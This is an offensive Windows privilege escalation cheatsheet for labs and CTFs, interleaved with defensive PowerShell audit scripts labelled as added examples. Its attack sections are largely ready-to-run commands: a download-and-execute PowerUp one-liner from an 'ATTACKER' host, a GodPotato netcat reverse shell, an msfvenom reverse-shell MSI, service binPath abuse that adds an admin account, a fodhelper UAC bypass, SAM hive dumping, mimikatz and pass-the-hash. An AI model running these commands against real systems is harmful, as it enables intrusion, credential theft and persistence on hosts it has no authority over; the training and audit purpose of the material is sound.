Overview

Windows privilege escalation is usually less about running one exploit and more about following a consistent checklist. After landing a shell, the goal is to quickly understand the user context, host configuration, available privileges, stored credentials, service permissions, and domain position before moving into noisier techniques.

This cheatsheet follows a practical order: start with cheap enumeration, run automated tooling in the background, manually triage the highest-value findings, and leave kernel exploits as a last resort.

Only run these checks on systems you are authorised to test, such as labs, CTFs, or environments where you have written permission.

Methodology

The first few minutes after getting a shell should be structured. Stabilise the session if needed, identify the user and host context, then begin enumeration before touching potentially disruptive techniques.

Attack Chain

  • Stabilise the shell and confirm the current user context
  • Enumerate user privileges, groups, OS version, architecture, and patch level
  • Run automated enumeration while manually reviewing high-value areas
  • Search for stored credentials and password reuse opportunities
  • Check token privileges such as SeImpersonatePrivilege, SeBackupPrivilege, and SeRestorePrivilege
  • Review service misconfigurations, weak permissions, unquoted paths, and DLL hijacking opportunities
  • Inspect registry-based escalation paths such as AutoLogon, autoruns, and AlwaysInstallElevated
  • Review scheduled tasks and startup folders for writable targets
  • Enumerate installed software, drivers, and local attack surface
  • Check domain context if the host is domain-joined
  • Use UAC bypasses only when already local admin at medium integrity
  • Consider kernel exploits only when safer paths are exhausted

Initial System & User Enumeration

Always start by identifying who you are, what privileges you have, and what kind of Windows host you are on. These checks shape the rest of the escalation path.

User Context

whoami
whoami /priv
whoami /groups
whoami /all

whoami /priv is especially important: token privileges can reveal an immediate path to SYSTEM, most often on service accounts such as IIS, MSSQL, or backup-related users.

Local Users and Groups

net user
net user %USERNAME%
net localgroup
net localgroup administrators
net accounts

This helps identify whether the current user is a local admin, belongs to a privileged group, or is subject to unusual account policy settings.

Host and Patch Level

hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
wmic qfe get Caption,Description,HotFixID,InstalledOn

The OS version, build, architecture, and installed patches are useful for exploit mapping. They are also important when choosing tools that depend on Windows version or .NET support.

Environment and Drives

set
echo %PATH%
wmic logicaldisk get caption,description,providername

The environment can reveal custom paths, writable directories, mapped drives, or operational clues left by administrators.

PowerShell Equivalents

$env:USERNAME
$env:COMPUTERNAME
$env:USERDOMAIN
[System.Environment]::OSVersion
Get-LocalUser
Get-LocalGroupMember Administrators
Get-HotFix | Sort-Object InstalledOn -Descending

PowerShell often gives cleaner output and is useful when working through WinRM or a constrained cmd.exe shell.


Automated Enumeration

Automated tools should not replace manual review, but they are excellent for catching common issues while you investigate manually.

Common Tools

Tool                          Use
winPEAS.exe / winPEASany.exe  Broad Windows enumeration with likely wins highlighted
PowerUp.ps1                   Services, registry checks, DLL hijacking, and common privilege escalation paths
Seatbelt.exe                  Host survey covering credentials, browser data, RDP, services, and more
JAWS                          Lightweight PowerShell enumeration
Watson / Sherlock             Missing patch and public exploit mapping
accesschk.exe                 Manual ACL and permission inspection

Example Usage

winPEASx64.exe quiet cmd
Seatbelt.exe -group=all

For PowerUp, a one-liner can be useful when execution policy gets in the way.

powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerUp.ps1'); Invoke-AllChecks"

Run one or two of these in the background, but still manually confirm anything they flag before attempting exploitation.


Stored Credentials & Password Hunting

Stored credentials are one of the highest-return categories in Windows privilege escalation. Look for passwords in files, registry keys, PowerShell history, configuration files, browser data, and unattended install files.

Search Files by Content

findstr /si "password" *.txt *.ini *.config *.xml *.ps1 *.bat *.cmd 2>nul
findstr /si "passwd" *.txt *.ini *.config *.xml 2>nul

Search Files by Name

dir /s /b *pass* *cred* *vnc* *.kdbx *.config 2>nul

Configuration files and KeePass databases are worth checking carefully. Even if they do not contain direct credentials, they may reveal usernames, hostnames, or services to target.

Unattended Install Files

type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\Panther\Unattended.xml 2>nul
type C:\Windows\System32\sysprep\sysprep.xml 2>nul
type C:\Windows\System32\sysprep\sysprep.inf 2>nul
type C:\unattend.xml 2>nul

Unattended installation files sometimes contain local administrator passwords or domain join credentials.

Group Policy Preferences

dir /s /b \\<DC>\SYSVOL\*.xml 2>nul
findstr /si "cpassword" \\<DC>\SYSVOL\*.xml

If a cpassword value is found, it can usually be decrypted because the historical Group Policy Preferences AES key is public.

Registry Credentials

Check for AutoLogon credentials first.

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Then check common third-party tools.

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v password
reg query HKCU\Software\ORL\WinVNC3\Password
reg query HKCU\Software\TightVNC\Server

Saved Credentials and PowerShell History

cmdkey /list
dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\
dir /a %USERPROFILE%\AppData\Roaming\Microsoft\Credentials\
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PowerShell history is a common source of cleartext credentials, especially in lab environments where administrators test commands interactively.
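The following is an added example and not part of the original cheatsheet: a read-only PowerShell audit of the residue locations covered in this section (unattend and sysprep answer files, Winlogon AutoLogon, PSReadLine history), written for cleanup rather than collection. It reports where material is found without printing the secret. The function name, the ExtraFiles parameter and the history regex are this example's own choices.

```powershell
# Added example: read-only audit of the credential-residue locations listed above.
# Reports *where* something is found so it can be removed or rotated; it never
# prints the secret itself. Runs as the current user; no elevation assumed.

function Find-CredentialResidue {
    [CmdletBinding()]
    param(
        # Additional answer/config files to inspect (parameter is this example's own)
        [string[]]$ExtraFiles = @()
    )

    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Unattended install / sysprep answer files
    $unattendPaths = @(
        "$env:SystemRoot\Panther\Unattend.xml",
        "$env:SystemRoot\Panther\Unattended.xml",
        "$env:SystemRoot\System32\sysprep\sysprep.xml",
        "$env:SystemRoot\System32\sysprep\sysprep.inf",
        "$env:SystemDrive\unattend.xml"
    ) + $ExtraFiles
    foreach ($p in $unattendPaths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $text = Get-Content -LiteralPath $p -Raw -ErrorAction SilentlyContinue
        # A <Password> element is the usual carrier; *SENSITIVE*DATA*DELETED*
        # means sysprep already scrubbed the value and the file can be ignored.
        if ($text -match '<Password>' -and $text -notmatch '\*SENSITIVE\*DATA\*DELETED\*') {
            $findings.Add([pscustomobject]@{
                Source = 'UnattendFile'; Location = $p; Detail = 'contains a <Password> element' })
        }
    }

    # 2. Winlogon AutoLogon: DefaultPassword is stored in cleartext in the registry
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
    if ($wl -and $wl.PSObject.Properties['DefaultPassword'] -and $wl.DefaultPassword) {
        $findings.Add([pscustomobject]@{
            Source = 'AutoLogon'; Location = $winlogon
            Detail = "DefaultPassword set for user '$($wl.DefaultUserName)'" })
    }

    # 3. PSReadLine history: flag lines that look like they carry a credential.
    #    The pattern is a heuristic chosen for this example; tune it to your estate.
    $history = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    if (Test-Path -LiteralPath $history) {
        $pattern = '(?i)(password|passwd|secret|-Credential|ConvertTo-SecureString|net\s+user\s+\S+\s+[^/\s]\S*)'
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $history) {
            $lineNo++
            if ($line -match $pattern) {
                $findings.Add([pscustomobject]@{
                    Source = 'PSReadLineHistory'; Location = "${history}:$lineNo"
                    Detail = "line matches '$($Matches[1])'" })
            }
        }
    }

    return $findings
}

# Usage: review the findings, then clear AutoLogon, scrub or delete the files,
# clear the history file, and rotate any password that was exposed.
Find-CredentialResidue | Format-Table -AutoSize
```

Each finding carries only a location and a reason, which is enough to drive remediation (clearing DefaultPassword, deleting scrubbed-but-forgotten answer files, rotating anything typed into an interactive session) without copying the secret into yet another log.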

Browser and Application Secrets

LaZagne.exe all

Tools such as LaZagne, SharpChrome, or manual browser profile inspection can reveal saved credentials, cookies, or tokens. Treat these as sensitive and only use them within authorised scope.

Pass-the-Hash Before Cracking

If you recover an NTLM hash, do not assume it must be cracked first. Test pass-the-hash where appropriate.

evil-winrm -i <target> -u <user> -H <ntlm_hash>
impacket-psexec <domain>/<user>@<target> -hashes :<ntlm_hash>

Token Privilege Abuse

Token privileges can create very fast escalation paths. Run whoami /priv early and review anything assigned to the current user.

High-Value Privileges

Privilege                      Common Abuse Path
SeImpersonatePrivilege         PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato
SeAssignPrimaryTokenPrivilege  Potato-family attacks in suitable contexts
SeBackupPrivilege              Read protected files such as SAM, SYSTEM, and NTDS.dit
SeRestorePrivilege             Replace protected files or service binaries
SeTakeOwnershipPrivilege       Take ownership of sensitive files and overwrite them
SeDebugPrivilege               Inject into or dump privileged processes
SeLoadDriverPrivilege          Load a vulnerable or malicious driver
SeManageVolumePrivilege        Abuse volume-level access to read sensitive files
SeTcbPrivilege                 Extremely powerful; effectively game over

SeImpersonatePrivilege

SeImpersonatePrivilege is common on service accounts such as IIS and MSSQL. If enabled, potato-family tools may provide a direct path to SYSTEM.

PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\Temp\nc.exe ATTACKER 4444 -e cmd"

Use the tool that matches the OS version and patch level. Older techniques may fail on newer builds, while newer potato variants often work in more modern lab environments.

SeBackupPrivilege

Backup privileges can allow sensitive registry hives to be saved even when normal users cannot read them directly.

reg save HKLM\SYSTEM C:\Temp\system.hiv
reg save HKLM\SAM C:\Temp\sam.hiv
reg save HKLM\SECURITY C:\Temp\security.hiv

Dump the hashes offline from the attacking machine.

impacket-secretsdump -sam sam.hiv -system system.hiv -security security.hiv LOCAL

On a domain controller, SeBackupPrivilege may also allow copying NTDS.dit through a shadow copy workflow.
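As an added example (not from the original cheatsheet), the script below audits which principals hold the high-value privileges from the table above. It parses the [Privilege Rights] section of a secedit policy export, which is secedit's real output format, so the same parser works on a saved .inf offline; a constructed sample is included. The default-holder lists are those of a standalone workstation and are this example's assumption (servers and domain controllers differ); the function name is also the example's own. The live export needs an elevated session.

```powershell
# Added example: audit who holds the high-value privileges from the table above.
# Source of truth is the [Privilege Rights] section of a secedit policy export.
# Assumed: elevation for the live export; default-holder lists are those of a
# standalone workstation and differ on servers and domain controllers.

$HighValuePrivileges = @{
    # well-known SIDs: 32-544 Administrators, 32-551 Backup Operators,
    # S-1-5-6 SERVICE, S-1-5-19 LOCAL SERVICE, S-1-5-20 NETWORK SERVICE
    'SeImpersonatePrivilege'        = @('*S-1-5-32-544','*S-1-5-6','*S-1-5-19','*S-1-5-20')
    'SeAssignPrimaryTokenPrivilege' = @('*S-1-5-19','*S-1-5-20')
    'SeBackupPrivilege'             = @('*S-1-5-32-544','*S-1-5-32-551')
    'SeRestorePrivilege'            = @('*S-1-5-32-544','*S-1-5-32-551')
    'SeTakeOwnershipPrivilege'      = @('*S-1-5-32-544')
    'SeDebugPrivilege'              = @('*S-1-5-32-544')
    'SeLoadDriverPrivilege'         = @('*S-1-5-32-544')
    'SeManageVolumePrivilege'       = @('*S-1-5-32-544')
    'SeTcbPrivilege'                = @()   # nobody should hold this
}

function Get-NonDefaultPrivilegeHolders {
    param([string[]]$PolicyLines)   # lines of a secedit .inf export
    $inRights = $false
    foreach ($line in $PolicyLines) {
        if ($line -match '^\[(.+)\]\s*$') { $inRights = ($Matches[1] -eq 'Privilege Rights'); continue }
        if (-not $inRights) { continue }
        if ($line -match '^\s*(Se\w+)\s*=\s*(.*)$') {
            $priv = $Matches[1]
            $rawHolders = $Matches[2]
            if (-not $HighValuePrivileges.ContainsKey($priv)) { continue }
            foreach ($h in ($rawHolders -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })) {
                if ($HighValuePrivileges[$priv] -contains $h) { continue }
                $name = $h
                if ($h -like '*S-1-*') {   # resolve the SID to a name when the host can
                    try {
                        $sid = New-Object System.Security.Principal.SecurityIdentifier($h.TrimStart('*'))
                        $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
                    } catch { }
                }
                [pscustomobject]@{ Privilege = $priv; Holder = $name; Raw = $h }
            }
        }
    }
}

# Constructed sample in secedit's format: svc_web has been handed SeImpersonate and
# SeBackup has been granted to Users (S-1-5-32-545); both should be reported.
$sampleText = @'
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,svc_web
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-545
SeDebugPrivilege = *S-1-5-32-544
'@
$sample = $sampleText -split "`r?`n"
Get-NonDefaultPrivilegeHolders -PolicyLines $sample | Format-Table -AutoSize

# Live audit (elevated): export only the user-rights area, parse it, then clean up.
$exportPath = Join-Path $env:TEMP 'secpol-userrights.inf'
secedit /export /cfg $exportPath /areas USER_RIGHTS | Out-Null
Get-NonDefaultPrivilegeHolders -PolicyLines (Get-Content -LiteralPath $exportPath) | Format-Table -AutoSize
Remove-Item -LiteralPath $exportPath -ErrorAction SilentlyContinue
```

Anything the audit reports is a user-rights assignment to review in Local Security Policy or the applicable GPO; service accounts that genuinely need SeImpersonatePrivilege should at least be isolated from hosts holding other sensitive data.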


Service Misconfigurations

Windows services are a classic escalation path. Focus on services running as privileged accounts where the current user can modify the service configuration, replace the binary, or write to a directory in the service path.

Unquoted Service Paths

List services and review binary paths.

sc query state= all
wmic service get name,displayname,pathname,startmode
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\"

If a service path contains spaces and is not quoted, Windows tries each space-delimited prefix of the path as an executable name before the full path. For example, an unquoted path such as:

C:\Program Files\Some Folder\service.exe

causes Windows to try C:\Program.exe, then C:\Program Files\Some.exe, before the real binary. If either location is writable and the service restarts, a file planted there runs with the service account's privileges.

Weak Service Permissions

Use accesschk to review who can modify service configuration.

accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv <username> *
accesschk.exe /accepteula -uwcqv "BUILTIN\Users" <ServiceName>

Check the on-disk binary permissions as well.

accesschk.exe /accepteula -quvw "C:\Path\To\service.exe"

If you have SERVICE_CHANGE_CONFIG, you may be able to modify the service binPath and execute a command as the service account.

sc config <ServiceName> binPath= "cmd /c net user pwn Pwn123! /add && net localgroup administrators pwn /add"
sc stop <ServiceName>
sc start <ServiceName>

DLL Hijacking

DLL hijacking becomes interesting when a privileged service tries to load a missing DLL from a writable directory.

Use Process Monitor when you have GUI access, filtering for:

NAME NOT FOUND
.dll

From a shell, check whether any directories in %PATH% are writable.

for %A in ("%path:;=";"%") do @(cacls %A 2>nul | findstr /i "everyone authenticated users builtin")

If a writable path is abused, drop a malicious DLL with the expected name and restart the affected service.


Registry-Based Escalations

Registry misconfigurations can expose credentials or allow code execution through installer policies and autoruns.

AlwaysInstallElevated

This path is only exploitable when both the HKCU and HKLM values are set to 1.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both are enabled, create an MSI payload and install it.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

Autorun Keys

Review autorun locations and check whether the referenced binaries or registry keys are writable.

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Check key permissions with accesschk.

accesschk.exe /accepteula -kvuqsw "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"

If you can modify an autorun entry that executes in a privileged context, it may become an escalation or persistence path.
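The following is an added example, not code from the original cheatsheet: an audit for the two registry conditions this section describes. AlwaysInstallElevated is only reported when both the HKCU and HKLM values are 1, and the HKLM autorun keys are reported when a low-privilege principal holds write rights on the key itself. The function names and the principal list are this example's own choices; HKCU\...\Run is deliberately not checked, because it is always writable by its owner and only runs as that user.

```powershell
# Added example: audit for AlwaysInstallElevated and writable HKLM autorun keys.

function Test-AlwaysInstallElevated {
    $keys = @('HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
              'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer')
    $enabled = 0
    foreach ($k in $keys) {
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($v -and [int]$v.AlwaysInstallElevated -eq 1) { $enabled++ }
    }
    # Both values must be 1. Remediation: set "Always install with elevated
    # privileges" to Disabled in both the Computer and User configuration.
    return ($enabled -eq 2)
}

function Get-WritableAutorunKeys {
    $autorunKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
    )
    # Principals any local user can act as; a write-capable ACE for one of these
    # means a standard user can plant an entry that runs for every logon.
    $lowPriv = '^(Everyone|BUILTIN\\Users|NT AUTHORITY\\Authenticated Users|NT AUTHORITY\\INTERACTIVE)$'
    $writeRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl'
    foreach ($k in $autorunKeys) {
        if (-not (Test-Path -Path $k)) { continue }
        $acl = Get-Acl -Path $k
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.IdentityReference.Value -notmatch $lowPriv) { continue }
            if (($ace.RegistryRights -band $writeRights) -eq 0) { continue }
            [pscustomobject]@{ Key = $k; Principal = $ace.IdentityReference.Value; Rights = $ace.RegistryRights }
        }
    }
}

if (Test-AlwaysInstallElevated) { Write-Warning 'AlwaysInstallElevated is set in both HKCU and HKLM' }
Get-WritableAutorunKeys | Format-Table -AutoSize
```

A reported key should have its ACL reset to the Windows default (Users: Read), and the binaries the existing entries point at deserve the same writability check as service binaries.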


Scheduled Tasks & Startup Items

Scheduled tasks often run as SYSTEM or an administrative user. The key is not only who the task runs as, but whether the script or binary it launches is writable.

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /i "TaskName Run As User"

Check common startup folders as well.

dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

If a task runs as a privileged account and points to a writable script or binary, replace or modify the target and wait for execution, or trigger the task manually if permitted.

accesschk.exe /accepteula -quv "C:\Path\To\Scripted.bat"
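As an added example that is not part of the original cheatsheet, the script below performs one read-only audit for the writable targets described in the service, DLL hijacking and scheduled task sections: unquoted service paths whose intermediate directories are writable, writable service binaries, writable %PATH% directories, and scheduled-task executables writable by low-privilege principals. It needs no elevation, since Get-Acl only reads. The function names, the principal list and the choice to test the WriteData bit are this example's own.

```powershell
# Added example: read-only audit for writable service, PATH and scheduled-task targets.

$LowPrivPrincipal = '^(Everyone|BUILTIN\\Users|NT AUTHORITY\\Authenticated Users|NT AUTHORITY\\INTERACTIVE)$'

function Test-LowPrivWritable {
    # $true when a low-privilege principal holds WriteData (overwrite a file, or
    # create files in a directory). Write, Modify and FullControl all include this
    # bit; the AppendData-only ACE Authenticated Users have on C:\ does not.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $writeData   = [System.Security.AccessControl.FileSystemRights]::WriteData
    $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }   # applies to children only
        if ($ace.IdentityReference.Value -notmatch $LowPrivPrincipal) { continue }
        if (($ace.FileSystemRights -band $writeData) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    # For 'C:\Program Files\Some Folder\service.exe' the service control manager
    # tries C:\Program.exe, then 'C:\Program Files\Some.exe', then the full path.
    param([string]$PathName)
    $exe = ($PathName -replace '(?i)\.exe\b.*$', '.exe').Trim()
    if ($exe.StartsWith('"') -or $exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Find-WritableServiceTargets {
    foreach ($svc in Get-CimInstance Win32_Service) {
        # Skip OS services under \Windows\, as the findstr /v filter above does
        if (-not $svc.PathName -or $svc.PathName -like '*\Windows\*') { continue }
        foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
            if (Test-LowPrivWritable (Split-Path -Path $cand -Parent)) {
                [pscustomobject]@{ Type = 'UnquotedPath'; Name = $svc.Name; RunsAs = $svc.StartName; Target = $cand }
            }
        }
        # Strip quotes and arguments to get the binary actually executed
        $binary = ($svc.PathName -replace '^"([^"]+)".*$', '$1') -replace '(?i)^(.*?\.exe)\b.*$', '$1'
        if (Test-LowPrivWritable $binary) {
            [pscustomobject]@{ Type = 'WritableBinary'; Name = $svc.Name; RunsAs = $svc.StartName; Target = $binary }
        }
    }
}

function Find-WritableTaskTargets {
    foreach ($task in (Get-ScheduledTask | Where-Object State -ne 'Disabled')) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # only Exec actions carry a binary
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (Test-LowPrivWritable $exe) {
                [pscustomobject]@{ Type = 'WritableTaskTarget'; Name = $task.TaskName; RunsAs = $task.Principal.UserId; Target = $exe }
            }
        }
    }
}

function Find-WritablePathDirs {
    foreach ($d in ($env:PATH -split ';' | Where-Object { $_ })) {
        if (Test-LowPrivWritable $d) {
            [pscustomobject]@{ Type = 'WritablePathDir'; Name = '%PATH%'; RunsAs = ''; Target = $d }
        }
    }
}

# Fixes: quote the ImagePath, move the binary to a directory with a tightened ACL,
# remove user-writable directories from the system PATH, and point tasks at
# protected locations.
@(Find-WritableServiceTargets; Find-WritableTaskTargets; Find-WritablePathDirs) | Format-Table -AutoSize
```

The RunsAs column is what turns a writable target into a finding worth fixing first: an entry running as LocalSystem or a domain administrator outranks one running as the invoking user. Inherit-only ACEs are skipped so that the Modify right Authenticated Users inherit on new folders under C:\ does not mark the drive root itself as writable.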

Installed Software & Vulnerable Drivers

Installed software can introduce local privilege escalation paths, especially when old versions run privileged services.

wmic product get name,version,vendor
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s

Review running processes and services for third-party software, AV/EDR, backup agents, database services, and remote management tools.

tasklist /svc
tasklist /v

Drivers are also worth reviewing, especially for bring-your-own-vulnerable-driver scenarios.

driverquery /v

Cross-reference suspicious drivers with resources such as the LOLDrivers project, exploit databases, and vendor advisories.


Network & Active Directory Context

If the machine is domain-joined, local privilege escalation may not be the only path. Domain context can reveal reachable systems, domain users, groups, and trust relationships.

Network Basics

ipconfig /all
route print
arp -a
netstat -ano

This helps identify additional interfaces, routes, listening services, and internal hosts that may not be visible externally.

Domain Enumeration

net view /domain
net group /domain
net group "Domain Admins" /domain
net user /domain
nltest /dclist:<domain>

Without RSAT, basic LDAP-style enumeration can still be performed from PowerShell.

([adsisearcher]'(objectClass=user)').FindAll() | % { $_.Properties.samaccountname }

For full Active Directory mapping, collect data with SharpHound and analyse it in BloodHound.

SharpHound.exe -c All

UAC Bypass

UAC bypasses are only useful in a specific situation: the current user is already a local administrator, but the session is running at medium integrity.

Check the integrity level.

whoami /groups | findstr /i "Mandatory"

Common bypass families vary by Windows build and patch level. Examples include:

fodhelper.exe
computerdefaults.exe
sdclt.exe
eventvwr.exe

A common fodhelper technique modifies the current user’s registry hive and then launches fodhelper.exe.

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe"
Start-Process "C:\Windows\System32\fodhelper.exe"

Tools such as UACME can help map bypass methods to specific Windows versions, but they should be used carefully because UAC bypass behaviour changes across builds.
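The following added example (not from the original cheatsheet) takes the defender's side of this section: it reports the host's UAC posture and looks for the ms-settings handler key that the fodhelper-style bypass plants. A non-elevated run sees only HKCU; an elevated run also walks the loaded user hives under HKEY_USERS. The function and field names are this example's own.

```powershell
# Added example: UAC posture report plus detection of the ms-settings handler hijack.

function Get-UacPosture {
    $pol = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    # ConsentPromptBehaviorAdmin: 0 = elevate silently, 2 = always notify,
    # 5 = prompt only for non-Windows binaries (default). Auto-elevating Windows
    # binaries such as fodhelper.exe skip the prompt unless the level is 2.
    [pscustomobject]@{
        EnableLUA                  = $pol.EnableLUA
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $pol.PromptOnSecureDesktop
        AutoElevateInPlay          = ($pol.EnableLUA -eq 1 -and $pol.ConsentPromptBehaviorAdmin -ne 2)
    }
}

function Find-MsSettingsHandlerHijack {
    # A normal profile has no HKCU\Software\Classes\ms-settings key at all; its
    # presence with a Shell\Open\command value is a strong indicator.
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    $hives = @{ 'HKCU' = 'HKCU:' }
    foreach ($u in (Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue)) {
        $sid = $u.PSChildName
        if ($sid -match '^S-1-5-21-' -and $sid -notlike '*_Classes' -and $sid -ne $me) {
            $hives[$sid] = "Registry::$($u.Name)"
        }
    }
    foreach ($entry in $hives.GetEnumerator()) {
        $key = "$($entry.Value)\Software\Classes\ms-settings\Shell\Open\command"
        if (-not (Test-Path -Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        [pscustomobject]@{
            User            = $entry.Key
            Command         = $props.'(default)'
            DelegateExecute = ($null -ne $props.PSObject.Properties['DelegateExecute'])
        }
    }
}

Get-UacPosture
Find-MsSettingsHandlerHijack | Format-Table -AutoSize
# Remediation: remove HKCU:\Software\Classes\ms-settings (Remove-Item -Recurse),
# set ConsentPromptBehaviorAdmin to 2, and alert on creation of this key
# (Sysmon Event ID 12/13) since legitimate software never writes it.
```

Setting UAC to Always notify (level 2) is the configuration change that closes the auto-elevate family as a whole; the registry check is the cheap post-hoc indicator for hosts where that is not yet in place.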


Kernel Exploits

Kernel exploits should be treated as a last resort. They are noisy, can crash the target, and are often unnecessary if credential, privilege, or service abuse paths exist.

Before using a kernel exploit, collect the exact OS details.

systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

Then map missing patches to known vulnerabilities using tools such as Watson, Sherlock, or wesng.

wes.py systeminfo.txt

Common older targets worth recognising include:

  • MS16-032 — Secondary Logon
  • MS15-051 / MS14-058 — win32k
  • CVE-2020-0796 — SMBGhost
  • CVE-2021-36934 — HiveNightmare / SeriousSAM
  • CVE-2021-1675 / CVE-2021-34527 — PrintNightmare
  • CVE-2022-26904 — User Profile Service

Only use public exploit code when you have matched the OS build, architecture, and patch state carefully.


Post-Exploitation Quick Wins

Once SYSTEM or local administrator access is achieved, the next step is usually credential recovery, proof collection, or domain escalation, depending on scope.

Dump Local Hashes

reg save HKLM\SAM C:\Temp\sam
reg save HKLM\SYSTEM C:\Temp\system
reg save HKLM\SECURITY C:\Temp\security
impacket-secretsdump -sam sam -system system -security security LOCAL

Mimikatz Essentials

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # lsadump::secrets

Noisy Lab-Only Persistence

In a lab or CTF, adding a local admin user can be a quick way to confirm control. In real engagements, this should only be done if explicitly allowed by the rules of engagement.

net user pwn Pwn123! /add
net localgroup administrators pwn /add
net localgroup "Remote Desktop Users" pwn /add

Quick Checklist

Use this as a quick mental checklist after getting a shell.

  1. Run whoami /all, systeminfo, and hostname
  2. Drop winPEAS and Seatbelt, then let them run in the background
  3. Check whoami /priv for token abuse opportunities
  4. Search for stored credentials in unattended files, GPP, registry, history, browser data, and config files
  5. Review service permissions, unquoted paths, writable binaries, and DLL hijacking opportunities
  6. Check registry escalation paths such as AlwaysInstallElevated and autoruns
  7. Review scheduled tasks and startup folders for writable targets
  8. Enumerate installed software and vulnerable drivers
  9. Enumerate Active Directory context if the host is domain-joined
  10. Consider UAC bypass only if already local admin at medium integrity
  11. Use kernel exploits only as a last resort

Essential Toolbox

Category             Tools
Enumeration          winPEAS, Seatbelt, PowerUp, JAWS, Watson, accesschk
Token abuse          PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato
Credential dumping   Mimikatz, LaZagne, SharpChrome, nanodump, pypykatz, secretsdump.py
Active Directory     SharpHound, BloodHound, Rubeus, Certify, ADRecon
UAC                  UACME
Patch mapping        wesng, Watson, Sherlock
Driver abuse         LOLDrivers

References

  • HackTricks — Windows Local Privilege Escalation
  • PayloadsAllTheThings — Windows Privilege Escalation
  • FuzzySecurity — Windows Privilege Escalation Fundamentals
  • Sushant747 — Windows PrivEsc Guide
  • LOLBAS Project
  • LOLDrivers Project

Key Takeaways

